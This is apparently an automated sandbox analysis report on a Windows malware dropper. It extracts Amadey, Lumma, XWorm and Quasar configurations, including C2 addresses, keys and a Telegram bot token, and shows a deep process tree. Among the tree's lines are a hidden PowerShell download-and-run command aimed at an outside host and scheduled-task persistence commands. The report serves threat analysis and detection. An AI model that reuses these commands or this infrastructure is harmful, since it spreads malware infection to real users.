Analysis

  • max time kernel
    84s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 11:22

General

  • Target

    random.exe

  • Size

    6.1MB

  • MD5

    5a0c7d37859d3542f6772b9ef5ee5cf8

  • SHA1

    27b53f77c9f99b87c6f9b1908310a5e2d73d1a79

  • SHA256

    16b64046640bb6230c3bf41bdebb18224781fef9f2225bc30b82a063b1ed3fa8

  • SHA512

    d2aa0be1f1cf059aaba9d3770c515f8be68698d7f631d321662feab5eae93996c9b4d23b862d7e59065701914498c9a92f1a687b302380dc56b9bc056b7fdc0a

  • SSDEEP

    98304:zN9nbWR9YW1UZPiPQHMP6sYv15XNcDNwKmzyVyrooaCs3TOJ1yC/nCjlHI8GpHCz:HY9YO+PiPpY3NONweCZ/ycPBCvJ9F8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://6plantainklj.run/opafg

https://gpuerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://reboundui.live/aomgd

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:6666

5.180.155.29:6666

Mutex

QPPP7ypX2vFWlxk3

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot8016176478:AAGVLtLncU8-ZLd-P86FqeQzAOXJybu2R9g/sendMessage?chat_id=5165347769

aes.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 9 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2120
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3032
    • C:\Users\Admin\AppData\Local\Temp\random.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe"
      1⤵
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:228
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1964
            • C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe
              "C:\Users\Admin\AppData\Local\Temp\10475710101\5uMVCoG.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3196
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1296
            • C:\Users\Admin\AppData\Local\Temp\10476780101\PJsPp3e.exe
              "C:\Users\Admin\AppData\Local\Temp\10476780101\PJsPp3e.exe"
              5⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2180
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ssvchost" /tr "C:\Users\Admin\AppData\Roaming\ssvchost"
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3052
            • C:\Users\Admin\AppData\Local\Temp\10476860101\6fe1e658cc.exe
              "C:\Users\Admin\AppData\Local\Temp\10476860101\6fe1e658cc.exe"
              5⤵
              • Executes dropped EXE
              PID:4636
            • C:\Users\Admin\AppData\Local\Temp\10476870101\628e5ce81f.exe
              "C:\Users\Admin\AppData\Local\Temp\10476870101\628e5ce81f.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2324
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn 2y7iLmaSRAC /tr "mshta C:\Users\Admin\AppData\Local\Temp\sNCAi115X.hta" /sc minute /mo 25 /ru "Admin" /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2976
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn 2y7iLmaSRAC /tr "mshta C:\Users\Admin\AppData\Local\Temp\sNCAi115X.hta" /sc minute /mo 25 /ru "Admin" /f
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3108
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\sNCAi115X.hta
                6⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4384
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OZWPWTFKGD4EXAPCNNTHOREERQFOUDET.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2044
                  • C:\Users\Admin\AppData\Local\TempOZWPWTFKGD4EXAPCNNTHOREERQFOUDET.EXE
                    "C:\Users\Admin\AppData\Local\TempOZWPWTFKGD4EXAPCNNTHOREERQFOUDET.EXE"
                    8⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3988
            • C:\Users\Admin\AppData\Local\Temp\10476880101\c8d802442e.exe
              "C:\Users\Admin\AppData\Local\Temp\10476880101\c8d802442e.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:3528
            • C:\Users\Admin\AppData\Local\Temp\10476890101\PJsPp3e.exe
              "C:\Users\Admin\AppData\Local\Temp\10476890101\PJsPp3e.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1652
            • C:\Users\Admin\AppData\Local\Temp\10476900101\YMauSAr.exe
              "C:\Users\Admin\AppData\Local\Temp\10476900101\YMauSAr.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious use of WriteProcessMemory
              PID:468
              • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
                C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3268
                • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                  7⤵
                  • Executes dropped EXE
                  PID:4508
                  • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                    8⤵
                    • Executes dropped EXE
                    PID:2176
                    • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                      C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                      9⤵
                      • Executes dropped EXE
                      PID:4256
                      • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4180
                        • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                          C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                          11⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4008
                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                            C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                            12⤵
                            • Executes dropped EXE
                            PID:3188
                            • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                              C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                              13⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1464
                              • C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                14⤵
                                • Executes dropped EXE
                                PID:1536
                                • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                  15⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:1944
                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
                                    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
                                    16⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:2788
                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
                                      17⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:5108
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        18⤵
                                          PID:3868
                                        • C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                          C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                          18⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:4464
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            19⤵
                                              PID:3328
                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                              C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                              19⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:3268
                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                20⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3076
                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                  21⤵
                                                  • Executes dropped EXE
                                                  PID:2984
                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                    22⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4976
                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
                                                      23⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2692
                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                        24⤵
                                                        • Executes dropped EXE
                                                        PID:4824
                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                          25⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4480
                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
                                                            26⤵
                                                            • Executes dropped EXE
                                                            PID:4024
                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                              27⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2616
                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                28⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4004
                                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
                                                                  29⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1760
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    30⤵
                                                                      PID:4008
                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
                                                                      30⤵
                                                                      • Executes dropped EXE
                                                                      PID:468
                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
                                                                        31⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4828
                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                          32⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1464
                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
                                                                            33⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3744
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              34⤵
                                                                                PID:1820
                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                34⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2920
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  35⤵
                                                                                    PID:4256
                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                    35⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3488
                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                      36⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3128
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        37⤵
                                                                                          PID:2164
                                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                          37⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:64
                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
                                                                                            38⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3452
                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                              39⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2824
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                40⤵
                                                                                                  PID:4180
                                                                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
                                                                                                  40⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2940
                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
                                                                                                    41⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4860
                                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                      42⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4828
                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
                                                                                                        43⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2984
                                                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                          44⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2976
                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                                                                                                            45⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3980
                                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
                                                                                                              46⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2848
                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                                47⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1716
                                                                                                                • C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
                                                                                                                  48⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3868
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                    49⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1112
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                                                                                      50⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:456
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                        51⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3732
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
                                                                                                                          52⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4272
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
                                                                                                                            53⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3160
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                                                                                                                              54⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3460
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                55⤵
                                                                                                                                  PID:4256
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                    56⤵
                                                                                                                                      PID:2164
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                                                                                                                                        57⤵
                                                                                                                                          PID:4004
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                                                                                                                                            58⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:264
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
                                                                                                                                              59⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:4464
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                                                                                60⤵
                                                                                                                                                  PID:3328
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                                                                                                                                                    61⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:468
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                      62⤵
                                                                                                                                                        PID:3856
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
                                                                                                                                                          63⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3752
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                                                                                                            64⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:3640
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                                                                                                                                                              65⤵
                                                                                                                                                                PID:3128
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  66⤵
                                                                                                                                                                    PID:3132
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
                                                                                                                                                                    66⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:3940
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      67⤵
                                                                                                                                                                        PID:1576
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
                                                                                                                                                                        67⤵
                                                                                                                                                                          PID:4380
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
